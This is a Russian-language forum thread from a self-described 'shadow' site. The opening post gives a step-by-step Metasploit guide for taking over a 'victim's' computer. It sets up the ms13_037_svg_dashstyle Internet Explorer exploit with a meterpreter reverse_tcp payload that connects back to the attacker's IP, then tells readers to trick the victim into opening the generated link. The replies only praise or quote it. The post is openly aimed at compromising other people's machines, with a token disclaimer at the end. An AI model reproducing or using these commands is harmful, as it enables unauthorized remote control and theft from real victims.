Перейти к содержимому

Sky Slate Blueberry Blackcurrant Watermelon Strawberry Orange Banana Apple Emerald Chocolate
Welcome to MMGPF - Теневой ресурс о документах, бизнесе, заработке
Зарегистрируйтесь сейчас, чтобы получить доступ ко всем нашим функциям. После регистрации и входа в систему Вы сможете создавать темы, отвечать на существующие темы, давать репутацию другим пользователям, получить свой собственный мессенджер, размещать обновления статуса, управлять профилем и многое другое. Это сообщение будет удалено после входа.
Вход в аккаунт Создать аккаунт
Фотография

Контролируем чужой компьютер


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 3
kambodJHA
  • Пользователи
  • 141 сообщений
  • PipPipPipPipPipPipPipPipPipPip
  • спамер
  • Last active: 17 апр 2018 17:52
  • Joined: 17 сен 2014

Сегодня мы с вами посмотрим на один мануальчик, с помощью которого вы сможете контролить компьютер вашей жертвы. Примечательно то, что вам не потребуются навыки взлома. Приступим, господа.



Нам понадобиться:
1) Виртуалка с кали линукс

2) Metasploit

3) Небольшие знания СИ



Работаем:
1) Запускаем Metasploit командой msfconsole



2) Выбираем уязвимость браузера

пишем в командную строку "use exploit/windows/browser/ms13_037_svg_dashstyle"



3) Далее нужно узнать свой IP, для этого пишем в командной строке ifconfig

Это нам понадобится !



4) set SRVHOST айпи ваш (это важно)



5) Командой show targets мы можем посмотреть доступные уязвимости



6) Выбираем уязвимость IE 8 on Windows 7 SP1 , для этого пишем set target 0 (или номер под которым находиться эта ↑↑↑↑↑ строчка )



7) Пол дела сделано , выбираем вирус который будет залит жертве

set PAYLOAD windows/meterpreter/reverse_tcp



8) Последняя стадия

set LHOST ваш айпи (который вы узнали командой ifconfig )



9) Пишем для поднятия уязвимой страницы exploit



10) Видим поле [*] Using URL: http://ваш айпи:8080/Kuo...



Копируем его и даем жертве !


Все. Теперь, если все сделано верно, мы увидим надпись meterpreter (когда ссылка будет открыта).

Еще одна оговорка, чтоб взлом состоялся, нужно, чтобы жертва использовала для открытия ссылки InternetExprorer.



Как шариться по компу жертвы разберетесь сами. Команда help в помощь.



Данный материал ни в коем случае не призывает вас к совершению противозаконных действий, и опубликован лишь в ознакомительных целях


  • 1

Юраски
  • Пользователи
  • 25 сообщений
  • PipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPipPip
  • проверенный продавец
  • Last active: 28 май 2018 09:16
  • Joined: 09 янв 2012
Всё лайтово )
  • 0

петюня
  • Старичёк
  • 141 сообщений
  • PipPipPipPipPipPipPipPipPipPip
  • Старожил
  • Last active: 18 май 2018 09:12
  • Joined: 02 сен 2014
Грамотно расписал. Неплохо
  • 0

Hi King
  • Пользователи
  • 103 сообщений
  • PipPipPipPipPipPipPipPipPipPip
  • спамер
  • Last active: 07 июн 2018 18:21
  • Joined: 04 дек 2013

Командой show targets мы можем посмотреть доступные уязвимости


  • 0




Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 анонимных